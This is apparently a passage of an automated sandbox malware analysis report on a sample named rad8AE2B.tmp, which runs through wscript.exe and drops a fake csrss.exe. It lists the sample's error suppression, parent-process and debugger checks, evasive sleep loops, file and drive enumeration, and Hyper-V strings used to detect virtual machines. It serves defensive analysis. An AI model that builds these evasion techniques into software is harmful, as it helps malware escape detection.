Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP6_2_0041A13C
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Windows\csrss.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00449089
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-47124
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -47434s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -52378s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -32500s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -31401s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 3488Thread sleep time: -35425s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -33732s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -50975s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -54757s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -46645s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -44960s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 3488Thread sleep time: -34101s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 3488Thread sleep time: -35492s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -32114s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -35895s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -55954s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 4716Thread sleep time: -58791s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp TID: 3488Thread sleep time: -30635s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_005685CE __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_005685CE
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00416D6D _memset,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,6_2_00416D6D
Contains functionality to query local drivesShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_00416AEC _memset,_memset,GetLogicalDriveStringsW,GetSystemDirectoryW,GetDriveTypeW,GetDriveTypeW,6_2_00416AEC
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpCode function: 6_2_0040AA8F __EH_prolog,GetSystemInfo,6_2_0040AA8F
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-licensing_31bf3856ad364e35_10.0.17134.1_none_369c533be4c3e496.manifestasBP`
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b.manifest59\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bef40208ce4908.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catest[
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_hyperv-vmemulateddevices.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1a750046421bf96\amd64_hyperv-vmemulatednic.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bcfb31102e62eb\amd64_hyperv-worker-events.resources_31bf3856ad364e35_10.0.17134.1_en-us_9de5622f209a7b21\eamd64_ialpss2i_gpio2_bxt_p.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c2ed1a4d3a2524\amd64_ialpss2i_gpio2_skl.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_c3ad514b87278211\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.81_none_30736e9038d6e6ac\9177amd64_hyperv-networking-switch-interface_31bf3856ad364e35_10.0.17134.1_none_cbcae0f157b5d02b\amd64_hyperv-compute-eventlog.resources_31bf3856ad364e35_10.0.17134.1_en-us_522940f2f04f07f9\amd64_halextintclpiodma.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_24bb2a71e75700a1\amd64_hyperv-vpci-rootporterr.resources_31bf3856ad364e35_10.0.17134.1_en-us_30ee0a3c7e36caae\3amd64_ialpss2i_i2c_bxt_p.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_ffa8f5f4e6504efb\amd64_ev
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumst_
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261.manifest(
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_3c5b1e1b1b3e66b3\2
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-f..wallrules.resources_31bf3856ad364e35_10.0.17134.1_en-us_7d008f07cc0acfbc.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.165_none_11e6025cbba84064\c
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat*w
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_c8885d1044f785b1.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_356d3b5898bc1c7d.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.17134.1_none_e99c08352e0bfafa.manifestd\
Source: wscript.exe, 00000001.00000002.8648989578.0000000002DAA000.00000004.sdmpBinary or memory string: Hyper-V RAW8T
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cate35\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.48_none_28a3bf323de300ba\
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumst~
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9831021987.0000000000981000.00000004.sdmpBinary or memory string: \??\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\*h
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c966966d5f8cf2.manifest\9
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42.manifestLrwQU
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.81_none_30736e9038d6e6ac\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.17134.1_none_dacb8dcdbfa5382f\J
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.17134.1_none_18c6a9392dd7eb3e.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a7d7.manifest*
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumat
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_bae31ba10711fa29.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.1_none_1ac11a9dc8f30e5b\\
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.1_none_1ac11a9dc8f30e5b.manifest\t
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..ercommon-deployment_31bf3856ad364e35_10.0.17134.1_none_ffda9e2d3858e036.manifest`
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumstt
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-storvsp_31bf3856ad364e35_10.0.17134.1_none_fabc5147bcc71691.manifestRqM^K
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.17134.1_en-us_662e0a371a2edd22\
Source: wscript.exe, 00000001.00000002.8654600004.0000000005440000.00000002.sdmp, rad8AE2B.tmp, 00000006.00000002.9859328234.00000000039B0000.00000002.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum*
Source: csrss.exe, 0000000A.00000002.9037154425.0000000000A22000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_halextintclpiodma.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_24bb2a71e75700a1\amd64_ialpss2i_gpio2_bxt_p.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_83c2ed1a4d3a2524\amd64_hyperv-vmemulatednic.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bcfb31102e62eb\2983amd64_hyperv-compute-eventlog.resources_31bf3856ad364e35_10.0.17134.1_en-us_522940f2f04f07f9\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.81_none_30736e9038d6e6ac\9177amd64_hyperv-vmemulateddevices.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1a750046421bf96\amd64_eventviewersettings.resources_31bf3856ad364e35_10.0.17134.1_en-us_7cb27ecefd0ec555\amd64_ialpss2i_gpio2_skl.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_c3ad514b87278211\amd64_hyperv-commandline-tool.resources_31bf3856ad364e35_10.0.17134.1_en-us_d5c4e754bc26201d\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.17134.1_none_7305852b7c12035c\amd64_hyperv-networking-switch-interface_31bf3856ad364e35_10.0.17134.1_none_cbcae0f157b5d02b\amd64_
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.17134.1_none_d80c4ce4e8fa0144.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hypervisor-events_31bf3856ad364e35_10.0.17134.1_none_93bac8ae42b1f037.manifestX
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumcatt?/
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..ients-firewallrules_31bf3856ad364e35_10.0.17134.1_none_d07683518a4c2ec2.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-p..ru-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_d16dce7672841ddd.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9335616015.0000000004B3E000.00000004.sdmpBinary or memory string: wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_c77057abb7bb80d3.manifestt
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_3c5b1e1b1b3e66b3.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.17134.1_en-us_a86f4344ed926804\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat1.catJ
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239.manifest6
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_0b749ee450213385\
Source: rad8AE2B.tmp, 00000006.00000002.9859235869.00000000039AC000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum11Y
Source: rad8AE2B.tmp, 00000006.00000002.9831021987.0000000000981000.00000004.sdmpBinary or memory string: \??\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.17134.1_en-us_a86f4344ed926804\*
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.17134.1_en-us_a86f4344ed926804.manifestP
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_9c1fa24ea8808bce.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catest1
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-k..erformance-counters_31bf3856ad364e35_10.0.17134.1_none_611f8a7fa810774a.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_8051bd2040ebffa9\I
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumK
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_ipmidrv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_2d93a60324c5d86c\5b86camd64_ipoib6x.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_e59925927d88680e\5b86camd64_microsoft-windows-cmisetup_31bf3856ad364e35_10.0.17134.112_none_fc7bc47aae4d520f\amd64_ialpssi_gpio.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_a649fe25b1990444\amd64_keyboard.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_14295de0d5889a92\7d2amd64_hyperv-vmemulateddevices_31bf3856ad364e35_10.0.17134.81_none_a622801bed1b811f\amd64_hyperv-vmserial.resources_31bf3856ad364e35_10.0.17134.1_en-us_6d3c997783423a80\amd64_hyperv-vmicvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_05720885d49a5857\amd64_iastorav.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_d010957a22aa6cc2\amd64_hyperv-vpci-rootporterr_31bf3856ad364e35_10.0.17134.1_none_4b48602cec1be5d9\amd64_ialpssi_i2c.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_0a046d4df7f0ac7b\amd64_itsas35i.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_f441e46bcde20aea\amd64_hype
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vdev-offline_31bf3856ad364e35_10.0.17134.1_none_c190bdf9d967faea.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4\
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b\
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: rad8AE2B.tmp, 00000006.00000003.9451618682.0000000003F16000.00000004.sdmpBinary or memory string: $$_syswow64_windowspowershell_v1.0_modules_hyper-v_1.1_274139982b49eac9.cdf-ms
